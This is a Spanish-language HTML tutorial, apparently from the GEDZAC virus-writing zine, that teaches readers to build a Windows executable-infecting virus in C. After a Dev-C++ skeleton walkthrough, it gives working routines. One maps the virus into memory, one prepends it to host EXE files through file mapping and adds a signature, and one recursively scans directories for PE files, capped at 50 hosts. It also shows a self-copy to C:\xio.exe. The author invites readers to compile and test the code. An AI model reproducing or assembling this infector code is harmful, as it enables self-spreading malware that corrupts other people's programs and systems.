﻿
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"><style type="text/css">
<!--
body,td,th {
	color: #FFFFFF;
}
body {
	background-color: #000000;
	SCROLLBAR-FACE-COLOR: #000000; 
	SCROLLBAR-HIGHLIGHT-COLOR: #0080c0; 
	SCROLLBAR-SHADOW-COLOR: #0080c0; 
	SCROLLBAR-3DLIGHT-COLOR: #000000; 
	SCROLLBAR-ARROW-COLOR: #c0c0c0; 
	SCROLLBAR-TRACK-COLOR: #000000; 
	SCROLLBAR-DARKSHADOW-COLOR: #000000

}
.style55 {font-family: "Courier New", Courier, monospace; font-size: 12px; }
.style62 {
	font-family: "Courier New", Courier, monospace;
	font-size: 14px;
	color: #0066CC;
	font-weight: bold;
	font-style: italic;
}
.style63 {font-family: "Courier New", Courier, monospace; font-size: 14px; color: #f88204; font-weight: bold; }
.style66 {color: #CCCCCC}
.style68 {color: #FF0000}
.Estilo4 {font-size: 14px; color: #FFFFFF; }
.Estilo5 {font-size: 18px; color: #FFFFFF; font-weight: bold; }
.Estilo6 {font-size: 14px; color: #00FF00; font-weight: bold; }
.Estilo8 {color: #0066FF}
.style78 {font-family: "Courier New", Courier, monospace; font-size: 12px; color: #999999; }
.Estilo16 {font-size: 14px; color: #FFFFFF; font-weight: bold; }
.style81 {color: #0000FF}
.style85 {font-family: "Courier New", Courier, monospace; font-size: 12px; color: #FFFFFF; }
-->

</style>
</head>

<body>

  <div align="left">
<p><span class="style55"><img src="../0x01.png" width="585" height="107"><bR>
      <span class="style66">#Infeccion de ejecutables mediante archivos proyectados en memoria</span><br>
    #Autor: <strong>Pseudoroot</strong> <em>&lt;pseudoroot@hotmail.com&gt;</em></span><br>
    </p>
  </div>
  <div align="left">
    <p align="justify" class="style55">Haber, he creado este pequeño minitutorial, debido a las  preguntas de siempre que recibía, y por mas que intentaba explicar por MSN,  siento que nunca se me entendía, y creo que ahora lo voy a tratar de forma tan  simple, pero tan simple que mas que seguro todos lo que lean el  minituto, lo entenderán sin problemas, y si no, bueno, creo que serian casos  especiales.. :P,  pero confio en que la mayoría  va a entender, aunque muchas veces lo he explicado ya, creo que aun no he sido  lo suficientemente claro, como para que quede, como el agua turbia.</p>
    <p align="justify" class="style55"><em><strong>NOTA:</strong></em> el autor da por hecho, que el lector, tiene instalado una versión del  Ide Dev C++, y si no pues, que lo descargue desde  multitud de servidores que existen en  Internet, en mi caso utilizo la versión 4.9.9.2 </p>
    <p align="justify" class="style55">Muy bien, comencemos</p>
</div>
    <div align="left" class="style55">
      <p><span class="style68">Source | C | main.c</span><br>
        <span class="style78"><strong>#include  &lt;windows.h&gt;</strong></span></p>
      <p class="style78"><strong>/*  Declare Windows procedure  */</strong><br>
          <strong>LRESULT CALLBACK  WindowProcedure (HWND, UINT, WPARAM, LPARAM);</strong></p>
      <p class="style78"><strong>/*  Make the class name into a global  variable  */</strong><br>
          <strong>char szClassName[ ]  = &quot;WindowsApp&quot;;</strong></p>
      <p class="style78"><strong>int WINAPI WinMain  (HINSTANCE hThisInstance,</strong><br>
          <strong>                    HINSTANCE hPrevInstance,</strong><br>
          <strong>                    LPSTR lpszArgument,</strong><br>
          <strong>                    int nFunsterStil)</strong></p>
      <p class="style78"><strong>{</strong><br>
          <strong>    HWND hwnd;               /* This is the handle for our window  */</strong><br>
          <strong>    MSG messages;            /* Here messages to the application  are saved */</strong><br>
          <strong>    WNDCLASSEX wincl;        /* Data structure for the windowclass  */</strong></p>
      <p class="style78"><strong>    /* The Window structure */</strong><br>
          <strong>    wincl.hInstance = hThisInstance;</strong><br>
          <strong>    wincl.lpszClassName = szClassName;</strong><br>
          <strong>    wincl.lpfnWndProc = WindowProcedure;      /* This function is called by windows */</strong><br>
          <strong>    wincl.style = CS_DBLCLKS;                 /* Catch double-clicks */</strong><br>
          <strong>    wincl.cbSize = sizeof (WNDCLASSEX);</strong></p>
      <p class="style78"><strong>    /* Use default icon and mouse-pointer */</strong><br>
          <strong>    wincl.hIcon = LoadIcon (NULL,  IDI_APPLICATION);</strong><br>
          <strong>    wincl.hIconSm = LoadIcon (NULL,  IDI_APPLICATION);</strong><br>
          <strong>    wincl.hCursor = LoadCursor (NULL,  IDC_ARROW);</strong><br>
          <strong>    wincl.lpszMenuName = NULL;                 /* No menu */</strong><br>
          <strong>     wincl.cbClsExtra = 0;                      /* No extra bytes after  the window class */</strong><br>
          <strong>    wincl.cbWndExtra = 0;                      /* structure or the  window instance */</strong><br>
          <strong>    /* Use Windows's default color as the  background of the window */</strong><br>
          <strong>    wincl.hbrBackground = (HBRUSH)  COLOR_BACKGROUND;</strong></p>
      <p class="style78"><strong>    /* Register the window class, and if it  fails quit the program */</strong><br>
          <strong>    if (!RegisterClassEx (&amp;wincl))</strong><br>
          <strong>        return 0;</strong></p>
      <p class="style78"><strong>    /* The class is registered, let's create  the program*/</strong><br>
          <strong>    hwnd = CreateWindowEx (</strong><br>
          <strong>            0,                   /* Extended  possibilites for variation */</strong><br>
          <strong>           szClassName,         /* Classname */</strong><br>
          <strong>           &quot;Windows App&quot;,       /* Title Text */</strong><br>
          <strong>           WS_OVERLAPPEDWINDOW, /* default  window */</strong><br>
          <strong>           CW_USEDEFAULT,       /* Windows decides the position */</strong><br>
          <strong>           CW_USEDEFAULT,       /* where the window ends up on the  screen */</strong><br>
          <strong>           544,                 /* The programs width */</strong><br>
          <strong>           375,                 /* and height in pixels */</strong><br>
          <strong>           HWND_DESKTOP,        /* The window is a child-window to desktop  */</strong><br>
          <strong>           NULL,                /* No menu */</strong><br>
          <strong>           hThisInstance,       /* Program Instance handler */</strong><br>
          <strong>           NULL                 /* No Window Creation data */</strong><br>
          <strong>           );</strong></p>
      <p class="style78"><strong>    /* Make the window visible on the screen */</strong><br>
          <strong>    ShowWindow (hwnd, nFunsterStil);</strong></p>
      <p class="style78"><strong>    /* Run the message loop. It will run until  GetMessage() returns 0 */</strong><br>
          <strong>    while (GetMessage (&amp;messages, NULL, 0,  0))</strong><br>
          <strong>    {</strong><br>
          <strong>        /* Translate virtual-key messages into  character messages */</strong><br>
          <strong>        TranslateMessage(&amp;messages);</strong><br>
          <strong>        /* Send message to WindowProcedure */</strong><br>
          <strong>        DispatchMessage(&amp;messages);</strong><br>
          <strong>    }</strong></p>
      <p class="style78"><strong>    /* The program return-value is 0 - The  value that PostQuitMessage() gave */</strong><br>
          <strong>    return messages.wParam;</strong><br>
          <strong>}</strong></p>
      <p class="style78"><strong>&nbsp;</strong></p>
      <p class="style78"><strong>/*  This function is called by the Windows  function DispatchMessage()  */</strong></p>
      <p class="style78"><strong>LRESULT CALLBACK  WindowProcedure (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam)</strong><br>
          <strong>{</strong><br>
          <strong>    switch (message)                  /* handle the messages */</strong><br>
          <strong>    {</strong><br>
          <strong>        case WM_DESTROY:</strong><br>
          <strong>            PostQuitMessage (0);       /* send a WM_QUIT to the message queue  */</strong><br>
          <strong>            break;</strong><br>
          <strong>        default:                      /* for messages that we  don't deal with */</strong><br>
          <strong>            return DefWindowProc (hwnd,  message, wParam, lParam);</strong><br>
          <strong>    }</strong></p>
      <p class="style78"><strong>     return 0;</strong><br>
          <strong>}</strong></p>
      <p align="justify">Este es el código que el Dev te pone, siempre, que si lo compilamos, (que  como compilamos?) nos vamos a el menú Ejecutar, compilar, si nos pide que  guardemos pues guardamos, y esperamos a que se compile. Esperamos que salga el  cuadrito y la frase Done. Que nos indicara que se compilado sin problemas,  vamos a la carpeta donde se compilo y ejecutamos el .Exe o binario o programa,  o como quieras llamarle. Y nos aparecera esta ventana.<br>
      </p>
    </div>
    <div align="left" class="style55">
      <p align="justify">Si no se han dado cuenta, no hemos entrado ni una sola linea de codigo, y  lo que hemos compilado a sido el codigo que el Dev pone por omision en  cualquier proyecto Windows Application (Win32).Pues bien.- ahora, indicare lo que tantas veces he dicho y que al parecer  pocos han entendido o han querido entender, dentro de todo ese code, para codear nuestros virus, sacaremos todo el  codigo que nos ejecuta esa ventana que nos muestra Windows al ejecutar el  programa.El codigo que hay que eliminar lo pondre en <span class="style81">azul</span>.</p>
      <p>&nbsp;</p>
      <p class="style78">#include &lt;windows.h&gt;</p>
      <p class="style81">/*   Declare Windows procedure  */<br>
        LRESULT CALLBACK WindowProcedure (HWND,  UINT, WPARAM, LPARAM);</p>
      <p class="style81">/*   Make the class name into a global variable  */<br>
        char szClassName[ ] =  &quot;WindowsApp&quot;;</p>
      <p class="style78">int WINAPI WinMain (HINSTANCE hThisInstance,<br>
      HINSTANCE hPrevInstance,<br>
      LPSTR lpszArgument,<br>
      int nFunsterStil)</p>
      <p><span class="style78">{</span><br>
        <span class="style81">HWND hwnd;                /* This is the handle for our window */<br>
        MSG messages;            /* Here  messages to the application are saved */<br>
        WNDCLASSEX wincl;        /* Data  structure for the windowclass */</span></p>
      <p class="style81">     /* The Window structure */<br>
        wincl.hInstance = hThisInstance;<br>
        wincl.lpszClassName = szClassName;<br>
        wincl.lpfnWndProc = WindowProcedure;       /* This function is called by windows */<br>
        wincl.style = CS_DBLCLKS;                 /* Catch double-clicks */<br>
        wincl.cbSize = sizeof (WNDCLASSEX);</p>
      <p class="style81">     /* Use default icon and mouse-pointer */<br>
        wincl.hIcon = LoadIcon (NULL, IDI_APPLICATION);<br>
        wincl.hIconSm = LoadIcon (NULL, IDI_APPLICATION);<br>
        wincl.hCursor = LoadCursor (NULL, IDC_ARROW);<br>
        wincl.lpszMenuName = NULL;                 /* No menu */<br>
        wincl.cbClsExtra = 0;                      /* No extra bytes after  the window class */<br>
        wincl.cbWndExtra = 0;                      /* structure or the  window instance */<br>
        /* Use Windows's default color as the background of the window */<br>
        wincl.hbrBackground = (HBRUSH) COLOR_BACKGROUND;</p>
      <p class="style81">     /* Register the window class, and if it fails quit the program */<br>
  if (!RegisterClassEx (&amp;wincl))<br>
        return 0;</p>
      <p class="style81">     /* The class is registered, let's create the program*/<br>
        hwnd = CreateWindowEx (<br>
        0,                   /* Extended  possibilites for variation */<br>
        szClassName,         /* Classname  */<br>
&quot;Windows App&quot;,       /*  Title Text */<br>
        WS_OVERLAPPEDWINDOW, /* default window */<br>
        CW_USEDEFAULT,       /* Windows  decides the position */<br>
        CW_USEDEFAULT,       /* where the  window ends up on the screen */<br>
        544,                 /* The  programs width */<br>
        375,                 /* and height  in pixels */<br>
        HWND_DESKTOP,        /* The window  is a child-window to desktop */<br>
        NULL,                /* No menu */<br>
        hThisInstance,       /* Program  Instance handler */<br>
        NULL                 /* No Window Creation data */<br>
        );</p>
      <p class="style81">     /* Make the window visible on the screen */<br>
        ShowWindow (hwnd, nFunsterStil);</p>
      <p class="style81">     /* Run the message loop. It will run until GetMessage() returns 0 */<br>
  while (GetMessage (&amp;messages, NULL, 0, 0))<br>
        {<br>
        /* Translate virtual-key messages into character messages */<br>
        TranslateMessage(&amp;messages);<br>
        /* Send message to WindowProcedure */<br>
        DispatchMessage(&amp;messages);<br>
        }</p>
      <p class="style81">     /* The program return-value is 0 - The value that PostQuitMessage() gave  */<br>
        return messages.wParam;<br>
        }</p>
      <p>&nbsp;</p>
      <p class="style81">/*   This function is called by the Windows function DispatchMessage()  */</p>
      <p class="style81">LRESULT CALLBACK WindowProcedure (HWND  hwnd, UINT message, WPARAM wParam, LPARAM lParam)<br>
        {<br>
        switch (message)                   /* handle the messages */<br>
        {<br>
        case WM_DESTROY:<br>
        PostQuitMessage (0);       /* send  a WM_QUIT to the message queue */<br>
        break;<br>
        default:                      /*  for messages that we don't deal with */<br>
        return DefWindowProc (hwnd, message, wParam, lParam);<br>
        }</p>
      <p>  <span class="style78">  return 0;<br>
      }</span></p>
      <p>&nbsp;</p>
</div>
<div align="left" class="style55"></div>
<div align="left" class="style55"></div>

<p align="justify" class="style55">Pues como se darán cuenta, hemos eliminado prácticamente todo el code, que  el Dev nos ha puesto por omision, y solo nos debio haber quedado esto.</p>
<p class="style78"><strong>#include &lt;windows.h&gt;</strong></p>
<p class="style78"><strong>int WINAPI WinMain  (HINSTANCE hThisInstance,</strong><br>
  <strong>                    HINSTANCE hPrevInstance,</strong><br>
  <strong>                    LPSTR lpszArgument,</strong><br>
<strong>                    int nFunsterStil)</strong></p>
<p class="style78"><strong>{</strong><br>
  <strong>   </strong><br>
  <strong>     return 0;</strong><br>
<strong>}</strong></p>
<p align="justify" class="style55">Si quieres, vuelve a compilar el code nuevamente, previamente eliminado el código  que puse en azul. Y al ejecutar el exe. Nos daremos cuenta que no nos sale  ninguna ventana ni nada, ( Eso es lo que querían muchos no? Que Windows no nos  mostrara nada).</p>
<p align="justify" class="style55">Lo que hemos dejado de código es esto</p>
<p class="style78"><strong>#include &lt;windows.h&gt;</strong></p>
<p align="justify" class="style55">Librería necesaria en prácticamente todas las aplicaciones para Windows,  pues en dicha librería se encuentra la declaración de todas las apis que se  utilizan habitualmente en cualquier programa.</p>
<p class="style78"><strong>int WINAPI WinMain  (HINSTANCE hThisInstance,</strong><br>
  <strong>                    HINSTANCE hPrevInstance,</strong><br>
  <strong>                    LPSTR lpszArgument,</strong><br>
<strong>                    int nFunsterStil)</strong></p>
<p align="justify" class="style55">Esta, es la función principal de todo programa en C++, como podremos darnos  cuanta nos dice claramente WinMain, (hacer referencia a Windows, y no int  main() que se utiliza cuando se programa en D.o.s. ) los parámetros que vienen  a continuación, son los que necesita el programa, y que de momento no nos  sirven. Indican entre otras cosas la línea de comandos del mismo programa.</p>
<p align="justify" class="style55">Luego viene {<br>
  El cual indica que la función principal del programa comienza. Y partir de  ahí., el programa se ejecutara cuando, hacemos doble clic en el mismo.</p>
<p class="style78">return 0; <br>
  <span class="style55">Devolverá el control al sistema operativo</span></p>
<p class="style78">}</p>
<p align="justify" class="style55">Cerrara el programa.<br>
  Generalmente. Yo programo. Declarando las variables globales,y  constantes primero, (como creo debe hacerse)  luego las funciones que nuestro programa (virus. Worm. O lo que sea) utilizará,  en el transcurso, para luego ir llamando a cada función dentro de la función  principal que como sabemos es la   WinMain ósea esta. </p>
<p class="style78"><strong>int WINAPI WinMain  (HINSTANCE hThisInstance,</strong><br>
  <strong>                    HINSTANCE hPrevInstance,</strong><br>
  <strong>                    LPSTR lpszArgument,</strong><br>
<strong>                    int nFunsterStil)</strong></p>
<p align="justify" class="style78"><strong>{</strong><br>
  <strong>    MessageBoxA(0,”MITOSIS #4”,”GEDZAC”,0);</strong><br>
  <strong>     return 0;</strong><br>
  <strong>}</strong><br>
  <span class="style85">Este, es básicamente, la estructura básica de un programa en C. tenemos que  saber que el programa al ser ejecutado comenzara a leer las instrucciones que  están inmediatamente luego de { de la función WinMain (Principal) y que desde  aquí. Llamaremos a las demás funciones que habremos declarado previamente ( en  el caso que hayamos creado funciones para nuestro virus, como habitualmente se  hace con un programa en C, o en cualquier otro lenguaje estructurado) solo que  para C, no hay diferencias entre procedimientos o funciones, sino que todas son  funciones, pero ese es otro cuento.</span></p>
<p align="justify" class="style55">         Ahora ya estamos en  condiciones de empezar a codearnos un simple o avanzado engendro vírico, todo  depende de cuantas ganas queramos y empeño queramos ponerle a esto, ademas de  los conocimientos de programación con los cuales contamos claro está. Por  ejemplo podriamos poner, una rutina de infeccion de ejecutables, verificando  que estos sean P.E. si lo son, los infectamos y si no lo son, pues no los  infectamos, conosco dos maneras de infectar ejecutables, mediante archivos  proyectados en memoria, y mediante las apis WriteFile y CreateFile, la primera  presenta ventajas cobre la segunda, en cuanto a rapidez en infectar los  archivos. Aquí usaremos la infeccion usando archivos mapeados. Pero primero,  sacaremos nuestro path, (es decir el path de nuestro bicho), para eso se usa la  api GetFullPathName(</p>
<p align="justify" class="style55">Ok, aquí. Colocare las funciones que nos permitiran infectar los archivos:<br>
  La siguiente funcion nos permite mapearnos a nosotros mismos para obtener  el code y luego pegarlo al host a infectar</p>
<p class="style78">int getcode()<br>
  {<br>
  <br>
  hVir =  CreateFile(&quot;C:\\xio.exe&quot;,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0);  //habro mi code <br>
  if (hVir==INVALID_HANDLE_VALUE) { CloseHandle(hVir);  return 0; } //verifico que se haya creado sino, cierro el handle y la funcion</p>
<p class="style78">szVir = GetFileSize(hVir,0); // obtengo mi tamaño para  usar la variable luego </p>
<p class="style78">mVir =  CreateFileMapping(hVir,0,PAGE_READONLY,0,szVir,NULL); // me mapeo para leer mi  contenido<br>
  if (mVir==NULL)<br>
  {  CloseHandle(hVir);<br>
  return 0;<br>
  } // sino logro  mapearmne me cierro <br>
  v = (unsigned char  *)MapViewOfFile(mVir,FILE_MAP_READ,0,0,0);   //obtengo mi code en memoria y lo apunto a v<br>
  if (v==NULL) {<br>
  CloseHandle(mVir);<br>
  CloseHandle(hVir);<br>
  return 0; } // sino lo logro cierro</p>
<p class="style78">    return 1;<br>
  }      </p>
<p>&nbsp;</p>
<p align="justify" class="style55">Ok, nos hemos proyectado en memoria, y luego con la funcion que viene a  continuación infectaremos los archivos que le pasemos como parámetro a la funcion.</p>
<p class="style78">int putcode(char *filename)<br>
  {<br>
  // funcion que mapeara e inf3ctara el archivo que se le  pase como parametro</p>
<p class="style78">     <br>
  hHost = CreateFile(filename,GENERIC_READ |  GENERIC_WRITE,FILE_SHARE_READ,0,OPEN_EXISTING,0,0);<br>
  if (hHost==INVALID_HANDLE_VALUE)  // abrimos un handle al host para leer y  escribir en el<br>
  {  CloseHandle(hHost);    // sino cerramos <br>
  return 0;<br>
  } <br>
  szHost = GetFileSize(hHost,0);  // obtenemos tamaño</p>
<p class="style78">mHost =  CreateFileMapping(hHost,0,PAGE_READWRITE,0,szHost+szVir+lstrlen(FIRMA),NULL);  //mapeamos el host<br>
  if (mHost==NULL) {<br>
  CloseHandle(hHost);  // sino  cerramos<br>
  return 0;<br>
  } </p>
<p class="style78">h = (unsigned char  *)MapViewOfFile(mHost,FILE_MAP_READ,0,0,szHost);  // apuntamos host<br>
  if (h==NULL)<br>
  {<br>
  CloseHandle(mHost);<br>
  CloseHandle(hHost);<br>
  return 0;<br>
  }</p>
<p class="style78">v = (unsigned char  *)MapViewOfFile(mVir,FILE_MAP_READ,0,0,0);   // apuntamos virus<br>
  if (v==NULL)<br>
  {<br>
  CloseHandle(mHost);<br>
  CloseHandle(hHost);<br>
  UnmapViewOfFile(h);<br>
  return 0;<br>
  }</p>
<p class="style78">f = (unsigned char  *)MapViewOfFile(mHost,FILE_MAP_WRITE,0,0,szHost+szVir+lstrlen(FIRMA)); //  apuntamos la firma<br>
  if (f==NULL) <br>
  {<br>
  goto  Exit;<br>
  }</p>
<p>&nbsp;</p>
<p class="style78">CopyMemory(&amp;f[szVir],&amp;h[0],szHost);   // rutinas que pegan los codigos<br>
  CopyMemory(&amp;f[0],&amp;v[0],szVir);      //   es decir con este juego de punteos conseguimos inf3ctar el host<br>
CopyMemory(&amp;f[szHost+szVir],FIRMA,lstrlen(FIRMA));</p>
<p class="style78">UnmapViewOfFile(f);   // liberamos todos<br>
  Exit:  //  por si no hemos logrado nada  ,en este caso solo cerramos <br>
  UnmapViewOfFile(h); UnmapViewOfFile(v);<br>
  CloseHandle(mHost); <br>
  CloseHandle(hHost);  <br>
  return 1;   </p>
<p class="style78">}</p>
<p>&nbsp;</p>
<p align="justify" class="style55">Ok… Luego de haber llamado a esta funcion pasandole como parámetro un  archivo hallado previamente con alguna rutina de busqueda con las apis FindFirstFile  y FindNextFile como esta:</p>
<p class="style78">int ScanFiles(char *dir)<br>
  { </p>
<p class="style78">//  Rutina que nos  permite ir por la casa y captura de archivos EXE, PE</p>
<p class="style78">char file[256];    <br>
  char buffer[256];<br>
  WIN32_FIND_DATA datos;<br>
  HANDLE buscar;<br>
  bool corriendo=true;<br>
  sprintf(buffer,&quot;%s*.*&quot;,dir);<br>
  buscar=FindFirstFile(buffer,&amp;datos);  //empezamos a buscar<br>
  if(buscar!=INVALID_HANDLE_VALUE)<br>
  {<br>
  while(corriendo)   // mientras ahayan files nos mantendremos en el bucle<br>
  {<br>
  if((datos.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY <br>
  ||datos.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM)<br>
&amp;&amp; (strstr(datos.cFileName,&quot;.&quot;)==0))</p>
<p class="style78">{<br>
  <br>
  char buf[256];<br>
  sprintf(buf,&quot;%s%s\\&quot;,dir,datos.cFileName);</p>
<p class="style78">ScanFiles(buf);<br>
  }</p>
<p class="style78">if(strstr(strupr(datos.cFileName),&quot;.EXE&quot;))  // buscamos los exe de los files que estemos  hayando<br>
  {<br>
  sprintf(file,&quot;%s%s&quot;,dir,datos.cFileName);  // vamos obteniendo path<br>
  // comprobar si tiene la firma<br>
  if((VeriPE(file))){ <br>
  MessageBoxA(NULL,file,&quot;archivo A  infectar&quot;,MB_OK);<br>
  ctn=ctn+1;   //  vamos contando los archivos infectados<br>
  //putcode(file);</p>
<p class="style78">if(ctn==50) {   // maximo de 50 host</p>
<p class="style78">goto ExitFunc; }            <br>
  }<br>
  }<br>
  corriendo=FindNextFile((void*)buscar,&amp;datos);<br>
  }<br>
  }<br>
  ExitFunc:<br>
  FindClose((void *)buscar);  </p>
<p class="style78">return 0;<br>
  }           </p>
<p>&nbsp;</p>
<p align="justify" class="style55">Todo el codigo expuesto, es parte de las rutinas de mi ultimo virus, que  esta presente tambien en la mitosis #4 de GEDZAC. Bueno a probar las rutinas,  compirarlas y probarlas.</p>
<p align="justify" class="style55">Como ultimo comentario decir que debes crear una copia de tu virus para  luego proyectarlo en memoria, se podria leer en tiempo de ejecución, pero e  preferido crear una copia y luego mapearme.</p>
<p class="style78">GetModuleFileName(0,name,256);</p>
<p align="justify" class="style55">La variable name debe ser un char de 256 caracteres y se declara asi char  name[256];<br>
  Y debe ser global para poder leerla desde todo el codigo y en la funcion  que se nos plasque , supongo que ya sabras que es una funcion global, estas  deben declararse al principio del codigo fuera de la funcion WinMain y fuera de  cualquier funcion, normalmente vienen declaradas después de las cabeceras  (#include). La copia la hacemos con la conocidisima api CopyFile.</p>
<p class="style78">CopyFile(name,&quot;C:\\xio.exe”,0);</p>
<p align="justify" class="style78"><span class="style85">Estas dos ultimas lineas deben ir puestas en la  function principal WinMain.<br>
  Ok, ya no me queda nada mas por comentar.<br>
  Saludos, a todos.</span><br>
</p>
<p align="justify" class="style55">&nbsp;</p>
<div align="left" class="style55"></div>
</body>
</html>
